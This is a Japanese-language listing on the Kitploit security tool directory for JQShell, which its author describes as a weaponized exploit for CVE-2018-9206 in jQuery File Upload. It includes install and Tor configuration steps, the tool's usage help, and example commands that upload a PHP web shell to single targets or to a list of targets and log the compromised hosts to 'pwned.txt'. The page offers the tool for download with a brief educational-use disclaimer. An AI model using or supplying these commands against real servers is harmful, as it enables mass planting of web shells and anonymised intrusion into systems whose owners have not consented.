Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
JQShell — CVE-2018-9206(jQuery File Upload)向けの自動エクスプロイトツール。単一/複数ターゲットのスキャン、Torプロキシサポート、出力ログ機能を備え、ペネトレーションテストおよび教育目的で使用します。 | Kitploit
ツール/GitHubGitHub/stahlz/jqshell
脆弱性スキャナーエクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubstahlz/jqshell

JQShell

CVE-2018-9206(jQuery File Upload)向けの自動エクスプロイトツール。単一/複数ターゲットのスキャン、Torプロキシサポート、出力ログ機能を備え、ペネトレーションテストおよび教育目的で使用します。

リポジトリを見る
62147年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

alt text

JQShell

CVE-2018-9206の武器化バージョン。

免責事項

これを管理していないサーバーに対して使用することは、ほとんどの国で違法です。 著者は、本ソフトウェアを違法目的で使用する者の行為について一切の責任を負いません。 本ソフトウェアは教育目的のみを意図しています。 本ソフトウェアの作成において、違法にサーバーを侵害したものはありません。

機能

  • シングルターゲット
  • マルチターゲット
  • Tor

前提条件

必要なパッケージをインストールしてください。

Python3

root@kitploit:~
pip3 install requests pysocks subprocess stem

Torコントロールポート

このスクリプトでTorを使用するには、torrcファイルを編集してTorコントロールポートを9051で有効にする必要があります。

通常、このファイルは /etc/tor/torrc にあります。

このファイルを開き、次の行を変更します。

root@kitploit:~
#ControlPort 9051

から

root@kitploit:~
ControlPort 9051

に変更します。

root@kitploit:~
torサービスを再起動します。

使用方法

root@kitploit:~
usage: jqshell.py [-h] [-l LIST_INIT] [-t SINGLE_TARGET] -s SHELL_LOC
                  [-o OUTPUTZ] [-tor]

optional arguments:
  -h, --help            このヘルプメッセージを表示して終了します
  -l LIST_INIT, --list LIST_INIT
                        悪用するアセットのリストを選択します
  -t SINGLE_TARGET, --target SINGLE_TARGET
                        単一の悪用ターゲット
  -s SHELL_LOC, --shell SHELL_LOC
                        必須です。シェルのフルパスを指定してください
  -o OUTPUTZ, --output OUTPUTZ
                        確認済みホストのリストを保存するフルパス
  -tor, --tor_proxy     Torがインストールされている場合に選択します。コントロールポートを有効にする必要があります

例

単一ターゲットに対して実行。

root@kitploit:~
python3 jqshell.py -t http://localhost/folderwerejqueryis -s /var/www/html/shell.php

単一ターゲットに対して実行、出力を保存。

root@kitploit:~
python3 jqshell.py -t https://localhost/folderwerejqueryis -s /var/www/html/shell.php -o pwned.txt

リストに対して実行、出力を保存。

root@kitploit:~
python3 jqshell.py -l /opt/jquery/test.txt -s /var/www/html/shell.php -o pwned.txt

著者

  • Joshua Whitaker
  • Twitter @_Stahlz
  • メール - [email protected]
  • ウェブサイト - stahl.io
ツールをダウンロード